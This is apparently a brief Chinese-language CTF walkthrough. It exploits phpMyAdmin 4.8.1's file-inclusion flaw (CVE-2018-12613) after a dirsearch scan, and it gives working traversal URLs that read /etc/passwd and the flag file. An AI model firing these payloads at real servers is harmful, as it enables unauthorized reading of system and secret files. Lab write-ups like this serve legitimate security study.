过来毛都没有
直接dirsearch 扫一下
发现存在 phpadmin 我们直接访问一下
啥都没有 但是给我们了 phpadmin的版本
我们去搜搜看是否存在漏洞
phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客
发现还真有 我们直接复现即可
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag 
